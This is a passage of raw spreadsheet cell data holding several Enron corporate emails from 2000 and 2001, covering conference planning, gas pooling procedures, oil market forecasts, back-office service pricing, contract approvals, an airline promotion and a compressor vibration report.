Subject: The Real Options Conference_x000D_
_x000D_
_x000D_
_x000D_
Dear Vince,_x000D_
_x000D_
As the above event is drawing closer, I thought I would write a quick email _x000D_
to finalise a few things with you.  I understand that you would like a guest _x000D_
to attend, please can you let me know their name and job title.  Also, if you _x000D_
could send me your conference checklist I would appreciate it, so that I can _x000D_
finalise details with my audio visual company._x000D_
_x000D_
In the meantime, if there is anything I can do for you, please do not _x000D_
hesitate to let me know on 0171-915-5116._x000D_
_x000D_
Kind Regards_x000D_
Crystal_x000D_
                                                                              _x000D_
                                                                              _x000D_
                                                                              _x000D_
                                                                              _x000D_
                                                                              _x000D_
                                                                              _x000D_
                                                                              _x000D_
                                                                              _x000D_
                                                                              _x000D_
                                                                              _x000D_
               _x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Jun 2000 08:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'karen_e._richardson@dom.com'})</t>
  </si>
  <si>
    <t>frozenset({'mdriscoll@enron.com', 'adiza@enron.com', 'chris.germany@enron.com', 'hboyd@columbiaenergy.com'})</t>
  </si>
  <si>
    <t>Partial Requirements Pooling - Latrobe Steel</t>
  </si>
  <si>
    <t>The attached file reflects necessary criteria for the customer to participate _x000D_
in_x000D_
this program._x000D_
Please refer to the Nomination Procedure section -- it indicates which _x000D_
contracts_x000D_
should be used as well as the required fields._x000D_
_x000D_
Please note that both the pool operator and the direct (or its agent) must _x000D_
enter_x000D_
corresponding nominations._x000D_
_x000D_
Please feel free to contact me at 216-736-6024 if you have any questions._x000D_
_x000D_
(See attached file: Partialpooling.doc)_x000D_
_x000D_
 - Partialpooling.doc</t>
  </si>
  <si>
    <t>Thu, 20 Jan 2000 23:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Poten &amp; Partners forecasts</t>
  </si>
  <si>
    <t xml:space="preserve">fyi   Marg._x000D_
---------------------- Forwarded by Margaret Carson/Corp/Enron on 01/21/2000 _x000D_
07:31 AM ---------------------------_x000D_
_x000D_
_x000D_
Doug Leach@ECT_x000D_
01/21/2000 07:00 AM_x000D_
To: Guy Dayvault/Corp/Enron@Enron_x000D_
cc: Margaret Carson/Corp/Enron@Enron, Rob Bradley/Corp/Enron@ENRON, Jim _x000D_
Goughary/HOU/ECT@ECT, Ted Robinson/HOU/ECT@ECT, Wade Doshier/HOU/ECT@ECT, _x000D_
David J Botchlett/HOU/ECT@ECT, John L Nowlan/HOU/ECT@ECT _x000D_
_x000D_
Subject: Poten &amp; Partners_x000D_
_x000D_
fyi_x000D_
---------------------- Forwarded by Doug Leach/HOU/ECT on 01/21/2000 06:58 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Doug Leach_x000D_
01/20/2000 03:47 PM_x000D_
To: Michael L Brown/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: David A Terlip/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Kevin _x000D_
Beasley/LON/ECT@ECT, John Chismar/SIN/ECT@ECT, Michel Decnop/SIN/ECT@ECT, _x000D_
Maurizio La Noce/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Marc De La _x000D_
Roche/HOU/ECT@ECT _x000D_
Subject: Poten &amp; Partners_x000D_
_x000D_
Just some of George Gail's observations:_x000D_
_x000D_
He expects WTI crude prices to return to a range of $19-$22/barrel by 2Q 2000 _x000D_
(Brent $18-$20) although emotions rather than fundamentals will continue to _x000D_
drive the market._x000D_
Saudi's sold Cal 00 naphtha at $8 M/T over the Platt's AG mean and the _x000D_
Kuwaiti's are offer their naphtha at $11 M/T over the mean. _x000D_
ENOC offered 700,000 tons of term naphtha and only sold 200,000 tons._x000D_
ADNOC's splitters should add even more naphtha supplies to the market._x000D_
Koch has closed their Rotterdam splitter due to poor economics. Not _x000D_
necessarily a permanent shutdown._x000D_
He expects the Brent/Dubai spread to return to more normal $1-$1.25/barrel._x000D_
Regarding condensate he predicts that actual demand will drive the market and _x000D_
there will be less bottomfeeding by the Japanese and other refiners. He does _x000D_
feel         the new splitters will reduce the worldwide volumes available, _x000D_
but that there will still be adequate supplies. _x000D_
He thinks crack spreads for refiners will still be weak during Cal 00._x000D_
Although some resid demand will be displaced by natural gas or LNG, he _x000D_
expects fairly stable differentials to crude._x000D_
He expects strong US gasoline demand, but limits his demand growth projection _x000D_
to 1% for the year._x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Jul 2000 11:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">CORRECTION TO SUPER SATURDAY DATES_x000D_
_x000D_
Two dates in our prior Save the Dates memo were incorrect.  The dates to save _x000D_
for the first Super Saturday weekend are Friday, October 27th and Saturday, _x000D_
October 28th.  The correct dates for the last Super Saturday weekend are _x000D_
Friday, December 8th and Saturday, December 9th._x000D_
_x000D_
We apologize for any inconvenience._x000D_
</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 08:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'conway77@earthlink.net'})</t>
  </si>
  <si>
    <t>jazz fest</t>
  </si>
  <si>
    <t>Conway,_x000D_
_x000D_
Let me know what you think and Lisa and I will talk about it some more as _x000D_
well._x000D_
_x000D_
http://www.insideneworleans.com/_x000D_
_x000D_
Talk to you soon._x000D_
_x000D_
Kevin</t>
  </si>
  <si>
    <t>Thu, 5 Apr 2001 18:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Costs/Mid Back office commercialization</t>
  </si>
  <si>
    <t>Why don't you and Rahil agree on the draft ASAP and then let Rahil send it out in draft form this Friday afternoon to all these individuals for their review and comments.  Rahil can work with these people directly next week on their comments.  Rahil is free from the day-to-day operations issues and has the time to push the product menu to the EA Originators._x000D_
_x000D_
We can still set up an offsite to finalize, but we need to get something out because these individuals are already out selling as we speak._x000D_
_x000D_
GP_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kitchen, Louise  _x000D_
Sent:	Thursday, April 05, 2001 11:15 AM_x000D_
To:	Beck, Sally_x000D_
Cc:	Piper, Greg; Jafry, Rahil_x000D_
Subject:	Re: Costs_x000D_
_x000D_
Shukaly resigned and left._x000D_
_x000D_
But I assume the invitation will be extended to all of their groups so that whoever they want can attend. _x000D_
_x000D_
I would actually prefer that the presentation is actually circulated to the groups on Friday rather than presented as we will wait forever on getting an offsite together.  How about circulating the presentation and then letting them refer all questions to Rahil - see how much interest you get.  One on ones are much better and I think this is how Rahil should proceed.  We need to get in front of customers in the next couple of weeks._x000D_
_x000D_
Let's aim to get a least three customers this quarter._x000D_
_x000D_
Louise_x000D_
_x000D_
_x000D_
   _x000D_
_x000D_
_x000D_
 	Enron Capital &amp; Trade Resources Corp.  From:  Sally Beck                           04/04/2001 07:08 PM	_x000D_
		_x000D_
_x000D_
_x000D_
_x000D_
To:	Louise Kitchen/HOU/ECT@ECT_x000D_
cc:	Greg Piper/Corp/Enron _x000D_
_x000D_
Subject:	Re: Costs   _x000D_
_x000D_
Rahil is working with me on a presentation that covers what our services are, the creation of a pricing desk, how that will work (process and revenue sharing), selling of services for others, our operations pricing model, the DASH process, key contacts in operations, etc.  I expect to review a draft by this Friday.  Tomorrow we will have the date set for such a meeting.  We are checking travel schedules for Laura Luce and Max Y. to see if we can catch both in Houston sometime next week.  Greg Piper suggests a meeting with all origination heads at once (a mini offsite).  We will do that if we can set a date that works for a majority.  If that doesn't work, we will simply do one-on-ones over the next ten days to get everyone.  Targeted attendees are:_x000D_
_x000D_
Gas			Frank Vickers (East)_x000D_
			Laura Luce (Central)_x000D_
			Barry Tycholiz (West)_x000D_
_x000D_
Derivatives		Fred LaGrasta_x000D_
_x000D_
Power		Dave Duran_x000D_
			Ozzie Pagan_x000D_
			Ed Baughman_x000D_
			_x000D_
_x000D_
Portland		Chris Calger_x000D_
_x000D_
Calgary		Ladain_x000D_
_x000D_
Mexico		Max Y. _x000D_
_x000D_
When you and I met we discussed most of these names.  I added the Calgary guy and Max.  I also want to share this info with Bob Shults and his EOL marketing team.  They talk with a lot of customers and may have the opportunity to bring up our services as well.  We have spent some time with Jean Mrha and John Grass, and will share the presentation with them as well.  _x000D_
_x000D_
Do you want to add any names?   If we do wind up with one date that will work for most, I will let you know that tomorrow so that you can attend if you would like.  --Sally 	_x000D_
	_x000D_
_x000D_
_x000D_
 _x000D_
Louise Kitchen_x000D_
04/04/2001 03:50 PM_x000D_
To:	Sally Beck/HOU/ECT@ECT_x000D_
cc:	 _x000D_
Subject:	Costs_x000D_
_x000D_
Weren't we supposed to be having a meeting on costs of back office services with the Heads of Origination?  Are we close to having this?_x000D_
_x000D_
Thanks_x000D_
_x000D_
Louise_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&lt;Embedded StdOleLink&gt;_x000D_
&lt;Embedded Picture (Device Independent Bitmap)&gt;_x000D_
&lt;Embedded Picture (Device Independent Bitmap)&gt;</t>
  </si>
  <si>
    <t>Fri, 27 Apr 2001 08:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: EOL approvals, 04-27-01</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks, you're the best!_x000D_
_x000D_
_x000D_
_x000D_
	Samuel Schott_x000D_
	04/27/2001 03:47 PM_x000D_
		_x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: EOL approvals, 04-27-01_x000D_
_x000D_
  Done !!_x000D_
_x000D_
Rgds._x000D_
_x000D_
Samuel x3-9890 (GCP)_x000D_
Enron Net Works _ Global Data Management_x000D_
_x000D_
_x000D_
_x000D_
From: Tana Jones on 04/27/2001 12:15 PM_x000D_
To: Samuel Schott/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: EOL approvals, 04-27-01_x000D_
_x000D_
Re:  Element Re_x000D_
_x000D_
I just checked with Brent Hendry, the attorney on this one, and it should _x000D_
read  "...as agent for XL Trading Partners Ltd." not "of"_x000D_
----- Forwarded by Tana Jones/HOU/ECT on 04/27/2001 12:13 PM -----_x000D_
_x000D_
	Walter Guidroz/ENRON@enronXgate_x000D_
	04/27/2001 11:40 AM_x000D_
		 _x000D_
		 To: Karen Lambert/HOU/ECT@ECT, Tana Jones/HOU/ECT@ECT, Samuel _x000D_
Schott/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Brant Reves/ENRON@enronXgate, _x000D_
Debbie R Brackett/ENRON@enronXgate, David Hardy/LON/ECT@ECT, Lesli _x000D_
Campbell/ENRON@enronXgate, Cynthia Clark/ENRON@enronXgate, Enron Europe _x000D_
Global CounterParty/LON/ECT@ECT, Stephanie Sever/ENRON@enronXgate, Tom _x000D_
Moran/ENRON@enronXgate, Claudia Clark/ENRON@enronXgate, William S _x000D_
Bradford/ENRON@enronXgate, Lisa Lees/ENRON@enronXgate, Juana _x000D_
Fayett/Corp/Enron@Enron, Jana Morse/Corp/Enron@Enron, Trang Le/HOU/ECT@ECT, _x000D_
Paul Maley/LON/ECT@ECT, Sonya Clarke/LON/ECT@ECT, Tim Davies/LON/ECT@ECT, _x000D_
Karen O'Day/ENRON@enronXgate, Tanya Rohauer/ENRON@enronXgate, Kelly _x000D_
Lombardi/NA/Enron@Enron, Brian Lindsay/Enron Communications@Enron _x000D_
Communications, EOL Call Center@ECT, Bill D Hare/HOU/ECT@ect, Amy _x000D_
Heffernan/Enron Communications@Enron Communications, Molly LaFuze/Enron _x000D_
Communications@Enron Communications, Danny Clark/Enron Communications@Enron _x000D_
Communications, Stephanie Panus/NA/Enron@Enron, Teresa _x000D_
Mandola/ENRON@enronXgate, Bill Kyle/ENRON@enronXgate, Amber Ebow/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: EOL approvals, 04-27-01_x000D_
_x000D_
Please see attached._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 19 Sep 2000 01:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: part-time work</t>
  </si>
  <si>
    <t xml:space="preserve">Zimin,_x000D_
_x000D_
Can you call Cantekin to discuss the details?_x000D_
_x000D_
Vince_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 09/19/2000 _x000D_
08:44 AM ---------------------------_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
09/18/2000 05:50 PM_x000D_
To: &lt;cantekin@mail.utexas.edu&gt;_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT _x000D_
Subject: Re: part-time work  _x000D_
_x000D_
Cantekin,_x000D_
_x000D_
I shall call you tomorrow to discuss the details._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Cantekin Dincerler" &lt;cantekin@mail.utexas.edu&gt; on 09/18/2000 02:59:41 PM_x000D_
Please respond to &lt;cantekin@mail.utexas.edu&gt;_x000D_
To: &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:  _x000D_
Subject: part-time work_x000D_
_x000D_
_x000D_
Hi Vince,_x000D_
_x000D_
I promised to get back to you on the part-time work issue. Sorry for the_x000D_
delay, I got back to Austin only last week. I talked to Ehud about this and_x000D_
he is OK with it. Just wanted to let you know._x000D_
_x000D_
Best,_x000D_
_x000D_
 ---------oOOo-----oOOo----------_x000D_
Cantekin Dincerler_x000D_
_x000D_
Doctoral Candidate_x000D_
The University of Texas at Austin_x000D_
Graduate School of Business_x000D_
Department of Finance_x000D_
office: (512) 471-1676_x000D_
fax   : (512) 471-5073_x000D_
home  : (512) 472-5356_x000D_
cell  : (512) 680-5355_x000D_
http://uts.cc.utexas.edu/~cantekin_x000D_
 -------------oooO-----Oooo----------_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Aug 2000 01:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Midwest Energy Hub LLC ("Midwest")</t>
  </si>
  <si>
    <t xml:space="preserve">Feels funny emailing someone so close.  I'm addicted to email, however,_x000D_
_x000D_
I saw Gregg in the elevator lobby as the door was closing.  I'm going to see _x000D_
if I can corner him while he is in town to see what is going on.  I'm not _x000D_
up-to-speed on this one._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
From: Sara Shackleton@ECT on 08/30/2000 08:14 AM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Midwest Energy Hub LLC ("Midwest")_x000D_
_x000D_
I'm free after 11 am - Sara_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 08/30/2000 08:13 AM -----_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	08/29/2000 07:09 PM_x000D_
		_x000D_
		 To: Sara Shackleton/HOU/ECT@ECT_x000D_
		 cc: Gregg Penman/Corp/Enron@Enron_x000D_
		 Subject: Re: Midwest Energy Hub LLC ("Midwest")_x000D_
_x000D_
Sara,_x000D_
_x000D_
Maybe a conference call with Gregg would be the most productive way to go._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
From: Sara Shackleton@ECT on 08/23/2000 05:19 PM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc: Gregg Penman/Corp/Enron@Enron _x000D_
_x000D_
Subject: Midwest Energy Hub LLC ("Midwest")_x000D_
_x000D_
Kay:  I left you a voice mail yesterday at Sheila's suggestion regarding _x000D_
Midwest.  Greg and I discussed the use of ENA's format of ISDA documentation _x000D_
by Midwest and I have a couple of questions about how our docs will be used, _x000D_
whether Midwest will be competing with us and who will be negotiating hedge _x000D_
agreements on behalf of Midwest (i.e., will ENA swap lawyers be involved?).  _x000D_
Please call me so that I can comply with Greg's request.._x000D_
Thanks.  Sara_x000D_
_x000D_
Greg:  I will have the boilerplate sent to you separately._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 3 Jun 2001 17:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jan.king@enron.com'})</t>
  </si>
  <si>
    <t>Re: Another approval requested</t>
  </si>
  <si>
    <t xml:space="preserve">approved_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Jan M King/ENRON@enronXgate 06/01/2001 01:42 PM 	   To: Elizabeth Sager/HOU/ECT@ECT  cc:   Subject: Another approval requested	_x000D_
_x000D_
_x000D_
Christian wants to know if he can have a palm pilot, too._x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 18:13:45 -0800 (PST)</t>
  </si>
  <si>
    <t>OnePass Member continental.com Specials for harry arora</t>
  </si>
  <si>
    <t xml:space="preserve">continental.com Specials for harry arora_x000D_
Tuesday, November 27, 2001_x000D_
****************************************_x000D_
_x000D_
AIRTRAIN NEWARK NOW OPEN_x000D_
_x000D_
Fast, safe, and dependable direct train service from Newark Airport to midtown Manhattan in less than 30 minutes. _x000D_
_x000D_
Visit continental.com at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C*9w%7Empm%7E_z%7Ck1zqmpq1%7Cpr9K9.A_x000D_
for more information.  _x000D_
_x000D_
 _x000D_
TRAVEL UPDATES_x000D_
Be sure to check continental.com at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C*9w%7Empm%7E_z%7Ck1zqmpq1%7Cpr9K9-A_x000D_
before leaving for the airport. We?re looking forward to welcoming you onboard!  _x000D_
_x000D_
 _x000D_
****************************************_x000D_
TABLE OF CONTENTS _x000D_
1. This Week's Destinations_x000D_
2. Continental Vacations Offers_x000D_
3. Hilton Hotels &amp; Resorts, Doubletree Hotels &amp; Resorts, &amp; Embassy Suites Hotels Offers_x000D_
4. Alamo Rent A Car Offers_x000D_
5. National Car Rental Offers_x000D_
_x000D_
****************************************_x000D_
1. THIS WEEK'S DESTINATIONS_x000D_
_x000D_
Depart Saturday, December 1 and return on either Monday, December 3 or Tuesday, December 4, 2001. Please see the Terms and Conditions listed at the end of this e-mail._x000D_
_x000D_
For OnePass members, here are special opportunities to redeem miles for travel to the following destinations. As an additional benefit, OnePass Elite members can travel using the miles below as the only payment necessary. The following are this week's OnePass continental.com Specials._x000D_
_x000D_
To use your OnePass miles (as listed below) to purchase continental.com Specials, you must call 1-800-642-1617._x000D_
_x000D_
THERE WILL NOT BE AN ADDITIONAL $20 CHARGE WHEN REDEEMING ONEPASS MILES FOR CONTINENTAL.COM SPECIALS THROUGH THE TOLL FREE RESERVATIONS NUMBER._x000D_
_x000D_
If you are not using your OnePass miles, purchase continental.com Specials online until 11:59pm (CST) Friday at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C*9w%7Empm%7E_z%7Ck1zqmpq1%7Cpr9K9%2CA_x000D_
You can also purchase continental.com Specials for an additional cost of $20 per ticket through our telephone service at 1-800-642-1617._x000D_
_x000D_
****************************************_x000D_
TRAVEL MAY ORIGINATE IN EITHER CITY_x000D_
****************************************_x000D_
_x000D_
****Roundtrip BETWEEN NEW YORK/NEWARK and:_x000D_
_x000D_
$29 + 12,500 Miles or $119 - Ft. Lauderdale, FL_x000D_
$29 + 10,000 Miles or $109 - Hartford, CT_x000D_
$29 + 10,000 Miles or $109 - Manchester, NH_x000D_
$29 + 10,000 Miles or $109 - Providence, RI_x000D_
_x000D_
_x000D_
********************************_x000D_
2. CONTINENTAL VACATIONS OFFERS _x000D_
 _x000D_
5,000 OnePass Bonus Miles Just for Skiing! _x000D_
_x000D_
Enjoy the best of Colorado's white powder during ski season. Book a ski package for 5 nights or longer and you can earn 5,000 OnePass Bonus Miles on Continental Airlines.  _x000D_
_x000D_
For more information about this exciting offer, visit:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C*9w%7Empm%7E_z%7Ck1zqmpq1%7Cpr9K9%2BA_x000D_
_x000D_
_x000D_
****************************************_x000D_
3. CONTINENTAL.COM SPECIALS FROM HILTON HOTELS AND RESORTS, DOUBLETREE_x000D_
HOTELS AND RESORTS, AND EMBASSY SUITES HOTELS_x000D_
_x000D_
The following rates are available December 1 ? December 3, 2001 and are priced per night._x000D_
--------------------------------------_x000D_
Fort Lauderdale, FL - Hilton Fort Lauderdale Airport, Dania, FL. - $119_x000D_
_x000D_
Hartford, CT - Hilton Hartford, Hartford, CT. - $119_x000D_
_x000D_
Manchester, NH - Hilton Dedham Place, Dedham, MA. - $79_x000D_
_x000D_
Newark, NJ - Hilton Parsippany, Parsippany, NJ. - $89_x000D_
Newark, NJ - Doubletree Club Suites Jersey City, Jersey City, NJ. - $159_x000D_
_x000D_
New York, NY - Hilton New York, New York, NY. - $179/Night, 12/1-2_x000D_
_x000D_
To book this week's special rates for Hilton Family Hotels, visit and book at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C*9w%7Empm%7E_z%7Ck1zqmpq1%7Cpr9K9*A_x000D_
Special rates apply only for the dates listed at each hotel and are subject to availability. Check hilton.com for specific dates at each Hilton Family Hotel. Or call at 1-800-774-1500 and ask for Value Rates. Restrictions apply to these rates._x000D_
_x000D_
_x000D_
********************************_x000D_
4. CONTINENTAL.COM SPECIALS FROM ALAMO RENT A CAR _x000D_
_x000D_
Rates listed below are valid on compact class vehicles at airport locations only. Other car types may be available. Rates are valid for rentals on Saturday, December 1 with returns Monday, December 3 or Tuesday, December 4, 2001._x000D_
-------------------------------_x000D_
$26 a day in:  Hartford, CT (BDL)_x000D_
$26 a day in:  Newark, NJ (EWR)_x000D_
$26 a day in:  Fort Lauderdale, FL (FLL)_x000D_
$26 a day in:  Providence, RI (PVD)_x000D_
_x000D_
To receive continental.com Specials discounted rates, simply make advance reservations and be sure to request ID # 596871 and Rate Code 33. Book your reservation online at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C*9w%7Empm%7E_z%7Ck1zqmpq1%7Cpr9K9%29A_x000D_
or contact Alamo at 1-800 GO ALAMO._x000D_
_x000D_
*If you are traveling to a city or a different date that is not listed, Alamo offers great rates when you book online at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C*9w%7Empm%7E_z%7Ck1zqmpq1%7Cpr9K9%28A_x000D_
For complete details on these offers, please refer to Alamo's terms and conditions below._x000D_
_x000D_
_x000D_
****************************************_x000D_
6. CONTINENTAL.COM SPECIALS FROM NATIONAL CAR RENTAL _x000D_
_x000D_
Rates listed below are valid on intermediate class vehicles at airport locations only. Other car types may be available. Rates are valid for rentals on Saturday, December 1 with returns Monday, December 3 or Tuesday, December 4, 2001._x000D_
------------------------------------------_x000D_
$29 a day in:  Hartford, CT (BDL)_x000D_
$29 a day in:  Newark, NJ (EWR)_x000D_
$29 a day in:  Fort Lauderdale, FL (FLL)_x000D_
$21 a day in:  Manchester, NH (MHT)_x000D_
_x000D_
To receive continental.com Specials discounted rates, simply make your reservations in advance and be sure to request Product Code COOLUS. To make your reservation, contact National at 1-800-CAR-RENT (1-800-227-7368), or book your reservation online at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C*9w%7Empm%7E_z%7Ck1zqmpq1%7Cpr9K9%27A_x000D_
Please enter COOLUS in the Product Rate Code field, and 5037126 in the Contract ID field to ensure you get these rates on these dates._x000D_
_x000D_
* If you are traveling to a city or a different date that is not listed, National offers great rates when you book online at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C*9w%7Empm%7E_z%7Ck1zqmpq1%7Cpr9K9%26A_x000D_
For complete details on these offers, please refer to National's terms and conditions below._x000D_
_x000D_
_x000D_
****************************************_x000D_
CONTINENTAL.COM SPECIALS RULES:  _x000D_
Fares include a $37.20 fuel surcharge.  Passenger Facility Charges, up to $18 depending on routing, are not included. Up to $2.75 per segment federal excise tax, as applicable, is not included.  Applicable International and or Canadian taxes and fees up to $108, varying by destination, are not included and may vary slightly depending on currency exchange rate at the time of purchase. For a complete listing of rules please visit:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C*9w%7Empm%7E_z%7Ck1zqmpq1%7Cpr9K9.%2FA_x000D_
 _x000D_
_x000D_
ALAMO RENT A CAR'S TERMS AND CONDITIONS:  _x000D_
Taxes (including VLF taxes up to US$1.89 per day in California and GST), other governmentally-authorized or imposed surcharges, license recoupment fees, fuel, additional driver fee, drop charges and optional items (such as CDW Waiver Savers(R) up to US$18.99 a day,) are extra. Renter must meet standard age, driver and credit requirements. Rates higher for drivers under age 25. Concession recoupment fees may add up to 14% to the rental rate at some on-airport locations. Up to 10.75% may be added to the rental rate if you rent at an off-airport location and exit on our shuttle bus. Weekly rates require a 5-day minimum rental or daily rates apply. For weekend rates, the vehicle must be picked up after 9 a.m. on Thursday and returned before midnight on Monday or higher daily rates apply. 24-hour advance reservation required. May not be combined with other discounts. Availability is limited. All vehicles must be returned to the country of origin. Offer not valid in San Jose, CA. _x000D_
 _x000D_
NATIONAL CAR RENTAL TERMS AND CONDITIONS:  _x000D_
Customer must provide Contract ID# at the time of reservation to be eligible for discounts. Offer valid at participating National locations in the US and Canada. Minimum rental age is 25. This offer is not valid with any other special discount or promotion. Standard rental qualifications apply. Subject to availability and blackout dates. Advance reservations required. Geographic driving restrictions may apply.  _x000D_
_x000D_
--------------------------------------- _x000D_
This e-mail message and its contents are copyrighted and are proprietary products of Continental Airlines, Inc. Any unauthorized use, reproduction, or transfer of the message or its content, in any medium, is strictly prohibited. _x000D_
 _x000D_
**************************************** _x000D_
If you need assistance please visit:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C*9w%7Empm%7E_z%7Ck1zqmpq1%7Cpr9K9..A_x000D_
View our privacy policy at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C*9w%7Empm%7E_z%7Ck1zqmpq1%7Cpr9K9.-A_x000D_
_x000D_
This e-mail was sent to: harora@ect.enron.com_x000D_
You registered with OnePass Number: AP628496 _x000D_
_x000D_
TO UNSUBSCRIBE:  _x000D_
We hope you will find continental.com Specials a valuable source of information. However, if you prefer not to take advantage of this opportunity, please let us know by visiting the continental.com Specials page on our web site at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C*9w%7Empm%7E_z%7Ck1zqmpq1%7Cpr9K9.%2BA_x000D_
_x000D_
TO SUBSCRIBE:  _x000D_
Please visit the continental.com Specials page on our web site at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C*9w%7Empm%7E_z%7Ck1zqmpq1%7Cpr9K9.%2CA_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Gallup - Status Update</t>
  </si>
  <si>
    <t xml:space="preserve">More stuff on Gallup.  Thanks.DF_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 05/03/2000 _x000D_
10:37 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Susan Scott                           05/03/2000 08:45 AM_x000D_
	_x000D_
_x000D_
To: Drew Fossum@ENRON, Donna Martens/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Gallup - Status Update_x000D_
_x000D_
FYI_x000D_
---------------------- Forwarded by Susan Scott/ET&amp;S/Enron on 05/03/2000 _x000D_
08:42 AM ---------------------------_x000D_
_x000D_
_x000D_
James Pfeffer@ENRON_DEVELOPMENT_x000D_
05/02/2000 08:35 PM_x000D_
To: Michel Nelson/ET&amp;S/Enron@ENRON, John R Keller/OTS/Enron@Enron, Ray _x000D_
Smith/ET&amp;S/Enron@ENRON, Lorraine Lindberg/ET&amp;S/Enron@ENRON, Arnold L _x000D_
Eisenstein/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Steven _x000D_
Harris/ET&amp;S/Enron@ENRON, James Pfeffer/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Rich Jolly/ET&amp;S/Enron@ENRON, Jeffery Fawcett/ET&amp;S/Enron@ENRON, Rich _x000D_
Plachy/Enron Communications@Enron Communications, David _x000D_
Roensch/ET&amp;S/Enron@ENRON, Team Gallup/ET&amp;S/Enron@ENRON, Ronald _x000D_
Matthews/ET&amp;S/Enron@ENRON, Earl Chanley/ET&amp;S/Enron@Enron, Vera _x000D_
Jones/ET&amp;S/Enron@ENRON, Brian H Mellon/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
John G Keller@EES, Phil Lowry@ENRON, Darrell Schoolcraft@ENRON, Susan _x000D_
Scott@ENRON, Kevin Hyatt@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Gallup - Status Update_x000D_
_x000D_
The Rolls-Royce vibration engineer has reported that the compressor itself is _x000D_
not inducing the abnormal vibration levels on the drive end bearings.  The _x000D_
engineer did report that the vibration is high for a new compressor, but not _x000D_
harmful to the compressor for the short term._x000D_
_x000D_
It is Rolls engineer's opinion that the excessive bearing vibration is due to _x000D_
vibrations created by gas flow through the suction strainer.  Rolls will be _x000D_
reviewing the gathered vibration data over the next few days to provide any _x000D_
further feedback._x000D_
_x000D_
TW Ops, via independent tests, has determined that the amplitude of the _x000D_
vibration that is eminating from the suction strainer is at a level which _x000D_
can, over time, be detrimental to the mechanical integrity of the unit _x000D_
piping. _x000D_
_x000D_
EECC, TW Ops Mgmt, and the TW Ops Team have discussed the situation and have _x000D_
decided to temporarily take the unit out of service to pull the suction _x000D_
strainer.  The strainer will be inspected for foreign material or damage.  _x000D_
The strainer will not be replaced unless some foreign material is found.  It _x000D_
is hoped that the removal of the strainer will 'de-tune' the piping system._x000D_
_x000D_
